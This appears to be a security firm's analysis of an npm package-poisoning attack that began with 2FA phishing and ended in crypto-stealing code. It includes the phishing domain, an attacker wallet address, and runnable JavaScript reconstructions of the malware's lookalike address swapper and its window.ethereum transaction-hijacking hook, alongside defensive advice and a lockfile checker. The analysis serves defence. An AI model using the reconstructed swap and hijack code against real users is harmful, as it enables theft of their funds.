Threat Intelligence: Analysis of the Large-Scale NPM Package Poisoning Incident
Key Points of the Attack
The attack originated from a phishing email received by the developer qix, who reported that the attackers impersonated npm officials. The sender address was support[@]npmjs[.]help.
qix also noted that the email's subject was "Update Two-Factor Authentication Info" and that it contained a malicious link:
https[://]www[.]npmjs[.]help/settings/qix/tfa/manageTfa?action=setup-totp. Victims who clicked "Update 2FA Now" were redirected to this link.
Email content:
https://gist.github.com/Qix-/c1f0d4f0d359dffaeec48dbfa1d40ee9
At the time of writing, this domain (https[://]www[.]npmjs[.]help) is no longer reachable and has been flagged as malicious on VirusTotal.
Discussions among other npm developers show that many received similar phishing emails, all urging the recipient to "update two-factor authentication information."
From qix's and other developers' accounts, it is clear that the attack relied on phishing emails impersonating npm officials. By tricking victims into "updating" their 2FA information on the phishing page, the attackers took over the accounts and then used the compromised accounts to publish npm package versions containing malicious code.
Analysis Process
Analysis of the compromised npm packages revealed heavily obfuscated code in index.js. After deobfuscation, the malicious code's main purpose turned out to be stealing users' cryptocurrency through two mechanisms: address replacement and transaction hijacking.
Address Replacement
The core logic of the address-replacement component is in the newdlocal() function, which performs the replacement with three sub-functions: f(), f2(), and f4().
f() implements the Levenshtein distance algorithm to measure string similarity. It is used to pick, from the attacker's preset address pool, the address that looks most like the original, so that the cryptocurrency address shown to the user is swapped for an attacker-controlled one that is hard to tell apart by eye.
f2() iterates over the address pool, calling f() to score each preset address against the original, and returns the attacker address with the highest similarity (the smallest edit distance).
f4() performs the actual replacement. It first converts the object vO into key-value pairs with Object.entries(), then scans the data for addresses matching each pattern. For every match, f4() calls f2() to pick the visually closest attacker address and substitutes it for the original. As a result, the user sees the attacker's address in the UI, and funds are lost if that address is copied and used for a transfer.
Variables:
- vA, vA2 … vA7: the attacker's cryptocurrency address pool
- vO: an object of regular expressions matching several cryptocurrency address formats
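The following is an added illustration of the f()/f2()/f4() mechanism, written for this edit; it is not the malware's code and not SlowMist's. It shows a Levenshtein distance function, lookalike selection over a pool, and a regex-driven pass over text. The attacker pool, the victim address and the page fragment are constructed placeholders, and only two address patterns are included where the sample's vO carried many more.

```javascript
// Added example for this write-up, modelled on the f()/f2()/f4() behaviour described
// above; it is not the malware's code. All addresses and the page snippet are constructed.

// f(): Levenshtein edit distance, single-row dynamic programming.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];          // value of row[i-1][j-1]
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];     // row[i-1][j], becomes the next iteration's diag
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + cost);
      diag = above;
    }
  }
  return row[b.length];
}

// f2(): the pool entry with the smallest edit distance to the original address.
function closestLookalike(original, pool) {
  let best = pool[0];
  let bestDist = Infinity;
  for (const candidate of pool) {
    const d = levenshtein(original.toLowerCase(), candidate.toLowerCase());
    if (d < bestDist) { bestDist = d; best = candidate; }
  }
  return best;
}

// vO: address patterns keyed by chain (two here; the sample matched many more formats).
const ADDRESS_PATTERNS = {
  eth: /\b0x[0-9a-fA-F]{40}\b/g,
  btc: /\b(?:bc1[0-9a-z]{25,62}|[13][1-9A-HJ-NP-Za-km-z]{25,34})\b/g,
};

// f4(): walk the patterns, and for every address found swap in the closest pool entry.
// Addresses already in the pool are left alone, so a second pass changes nothing.
function replaceAddresses(text, pools) {
  let out = text;
  for (const [chain, pattern] of Object.entries(ADDRESS_PATTERNS)) {
    const pool = pools[chain];
    if (!pool || pool.length === 0) continue;
    out = out.replace(pattern, (match) =>
      pool.some((p) => p.toLowerCase() === match.toLowerCase())
        ? match
        : closestLookalike(match, pool));
  }
  return out;
}

// Constructed attacker pool (vA, vA2, ...). The first entry shares the victim's
// prefix and most of its suffix, which is exactly what the distance metric rewards.
const ATTACKER_POOL = {
  eth: [
    "0x1234567890abcdef1234567890abcdef12345600",
    "0xabcdefabcdefabcdefabcdefabcdefabcdefabcd",
    "0x" + "9".repeat(40),
  ],
};
const VICTIM_ETH = "0x1234567890abcdef1234567890abcdef12345678";

// Constructed page fragment of the kind the swap runs over (a deposit address in the DOM).
function demo() {
  const html = `<span class="deposit">Send ETH to ${VICTIM_ETH}</span>`;
  return replaceAddresses(html, ATTACKER_POOL);
}
```

The pool selection is the part worth noticing: the attacker does not need a single perfect lookalike, only a pool large enough that some entry shares the first and last characters most people compare when they glance at an address. Checking the full address against an independent source (the exchange's deposit page opened separately, or a previously saved address) is the only reliable counter.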
Transaction Hijacking
The core logic of the transaction-hijacking component resides in the runmask() function. It repeatedly polls the wallet connection status via f8(). Once a wallet connection is detected, f7() is triggered to install the wallet hooks.
f7() uses Object.defineProperty() to replace the core methods of window.ethereum (request, send, sendAsync) with malicious proxy functions generated by f6(), while backing up the original methods in a Map. Every wallet interaction from the page therefore passes through the attacker's code.
f6() alters transaction parameters by calling f5(), depending on the request type:
- eth_sendTransaction: calls f5(…, true) to modify the transaction parameters
- solana_signTransaction / solana_signAndSendTransaction: calls f5(…, false) to replace public keys and recipient addresses
f5() implements the actual parameter-replacement logic:
For simple ETH transfers, the recipient address is replaced with 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976
For smart-contract interactions, it parses the data field and replaces the address parameters of common function signatures such as approve and transfer
For other calls, any address that is not already attacker-controlled is replaced with an attacker-controlled address
For Solana transactions, f5() replaces all addresses in instructions.accounts, keys.pubkey, and the recipient/destination fields with 19111111111111111111111111111111
The attacker's intent behind the Solana replacement remains unclear. Note that this value does not decode to a valid 32-byte Solana public key, so transactions rewritten with it would be expected to fail rather than be redirected.
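An added example, written for this edit and not taken from the malware, showing how a provider hook of the shape described above rewrites an eth_sendTransaction request on its way to the wallet. It covers the plain-transfer and approve/transfer cases; the "other calls" branch and the Solana branch are not reproduced. The attacker address is a constructed placeholder, and window.ethereum is replaced by a synchronous stand-in so the snippet runs under Node.

```javascript
// Added example for this write-up, modelled on the runmask()/f7()/f6()/f5() behaviour
// described above; it is not the malware's code. The attacker address and the provider
// are constructed stand-ins (window.ethereum is faked so this runs under Node).
const ATTACKER_ETH = "0x" + "0".repeat(36) + "dead";   // constructed placeholder

const TRANSFER_SIG = "0xa9059cbb"; // ERC-20 transfer(address,uint256)
const APPROVE_SIG  = "0x095ea7b3"; // ERC-20 approve(address,uint256)

// f5() for EVM: plain transfer -> swap `to`; approve/transfer calldata -> swap the
// address argument (the first 32-byte ABI word after the 4-byte selector).
function rewriteTx(tx, attacker) {
  const out = { ...tx };
  const data = (tx.data || "0x").toLowerCase();
  if (data === "0x") {
    out.to = attacker;
  } else if (data.length >= 10 + 64) {
    const selector = data.slice(0, 10);
    if (selector === TRANSFER_SIG || selector === APPROVE_SIG) {
      const word = "0".repeat(24) + attacker.slice(2).toLowerCase();
      out.data = selector + word + data.slice(10 + 64);
    }
  }
  return out;
}

// f7()/f6(): shadow request/send/sendAsync with proxies via defineProperty and keep the
// originals in a Map; each proxy rewrites eth_sendTransaction params, then forwards.
function hijackProvider(provider, attacker) {
  const originals = new Map();
  for (const name of ["request", "send", "sendAsync"]) {
    const orig = provider[name];
    if (typeof orig !== "function") continue;
    originals.set(name, orig);
    Object.defineProperty(provider, name, {
      configurable: true,
      writable: true,
      enumerable: true,
      value(...args) {
        const payload = args[0];
        if (payload && payload.method === "eth_sendTransaction" && Array.isArray(payload.params)) {
          payload.params = payload.params.map((tx) => rewriteTx(tx, attacker));
        }
        return orig.apply(provider, args);
      },
    });
  }
  return originals;
}

// Minimal synchronous stand-in for an injected EIP-1193 provider: it records every
// payload it receives so we can see what the wallet would actually be asked to sign.
function makeFakeProvider(received) {
  const handle = (payload) => { received.push(payload); return "0xtxhash"; };
  return {
    request: handle,
    send: (payload, cb) => { const r = handle(payload); if (cb) cb(null, r); return r; },
    sendAsync: (payload, cb) => { const r = handle(payload); if (cb) cb(null, r); },
  };
}

// A dapp sends 1 ETH to a friend; the wallet receives a transaction to the attacker.
function demo() {
  const received = [];
  const window = { ethereum: makeFakeProvider(received) };  // stand-in for the browser global
  hijackProvider(window.ethereum, ATTACKER_ETH);
  const intended = { from: "0x" + "1".repeat(40), to: "0x" + "2".repeat(40), value: "0xde0b6b3a7640000" };
  window.ethereum.request({ method: "eth_sendTransaction", params: [intended] });
  return { intendedTo: intended.to, walletSawTo: received[0].params[0].to };
}
```

The dapp's own transaction object is left untouched, which is why nothing looks wrong on the page: the payload is only altered on its way into the provider. The wallet extension's confirmation dialog is the one surface that page-level code of this kind cannot rewrite, so the recipient and calldata shown there are what should be checked before signing.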
Conclusion
This attack highlights the serious risk posed by phishing emails combined with social engineering. SlowMist recommends that developers stay highly vigilant about email senders and domains and avoid clicking suspicious links directly. Sensitive operations such as 2FA changes should be performed by navigating to the official website yourself, in a trusted environment.
In addition, when building and releasing new versions, developers should lock dependency versions. Security or functional updates should be applied through an internal review, updating the locked versions deliberately rather than picking up whatever version is newest, to avoid introducing new risks.
For more information on APT intelligence, dependency supply chain attacks, and other security news, consider using SlowMist's MistEye Web3 threat intelligence and dynamic security monitoring tool to quickly identify threats and block attacks.
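As an added, practical counterpart to the locking advice (example code written for this edit, not a SlowMist tool): given a parsed package-lock.json in the lockfileVersion 2/3 layout, list every version a package is pinned at, including nested copies under another package's node_modules, and compare the result with an advisory list. The lockfile, package names and versions below are constructed.

```javascript
// Added example (not part of the SlowMist write-up): inspect what a package-lock.json
// (lockfileVersion 2 or 3, "packages" keyed by install path) actually pins, and compare
// it with an advisory list before running `npm ci`. All data below is constructed.

// Read and parse a lockfile from disk (CommonJS; not exercised by the sample below).
function loadLock(path) {
  const fs = require("node:fs");
  return JSON.parse(fs.readFileSync(path, "utf8"));
}

// Every version of `name` pinned anywhere in the tree. Keys look like
// "node_modules/<name>" for top-level installs and
// "node_modules/<parent>/node_modules/<name>" for nested copies; both are matched.
function lockedVersions(lock, name) {
  const versions = new Set();
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === `node_modules/${name}` || path.endsWith(`/node_modules/${name}`)) {
      if (entry && entry.version) versions.add(entry.version);
    }
  }
  return [...versions].sort();   // lexical sort; fine for a report, not a semver compare
}

// advisory: { packageName: [versions to reject] }. Returns the pinned versions that hit.
function findAdvisoryHits(lock, advisory) {
  const hits = [];
  for (const [name, bad] of Object.entries(advisory)) {
    for (const v of lockedVersions(lock, name)) {
      if (bad.includes(v)) hits.push({ name, version: v });
    }
  }
  return hits;
}

// Constructed sample lockfile: example-b is pinned twice, once at top level and once
// nested under example-a, which is the copy a quick look at package.json would miss.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "my-app", dependencies: { "example-a": "^1.0.0", "example-b": "^2.0.0" } },
    "node_modules/example-a": { version: "1.0.0", dependencies: { "example-b": "^2.0.0" } },
    "node_modules/example-b": { version: "2.3.0" },
    "node_modules/example-a/node_modules/example-b": { version: "2.1.0" },
  },
};

// Constructed advisory: versions an internal review has not approved.
const SAMPLE_ADVISORY = { "example-b": ["2.1.0"] };
```

Installing with `npm ci --ignore-scripts` keeps the build on exactly the pinned versions and stops install-time scripts from running; pinned versions are then changed only by editing the lockfile on purpose after review, which is the workflow the recommendation above describes.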
Official Website: https://misteye.io/
Contact: https://www.slowmist.com/contact-us.html
About SlowMist
SlowMist is a blockchain security firm established in January 2018. It was founded by a team with over ten years of network security experience, with the aim of becoming a global force. Our goal is to make the blockchain ecosystem as secure as possible for everyone. We are now a renowned international blockchain security firm that has worked with well-known projects such as HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, etc.
SlowMist offers a range of services that include, but are not limited to, security audits, threat intelligence, defense deployment, security consulting, and other security-related services. We also offer AML (anti-money laundering) software, MistEye (security monitoring), SlowMist Hacked (crypto hack archives), FireWall.x (smart contract firewall) and other SaaS products. We have partnerships with domestic and international companies such as Akamai, BitDefender, RC², TianJi Partners, IPIP, etc. Our extensive work in cryptocurrency crime investigations has been cited by international organizations and government bodies, including the United Nations Security Council and the United Nations Office on Drugs and Crime.
By delivering a comprehensive security solution customized to individual projects, we can identify risks and prevent them from occurring. Our team has found and published several high-risk blockchain security flaws, spreading awareness and raising security standards in the blockchain ecosystem.
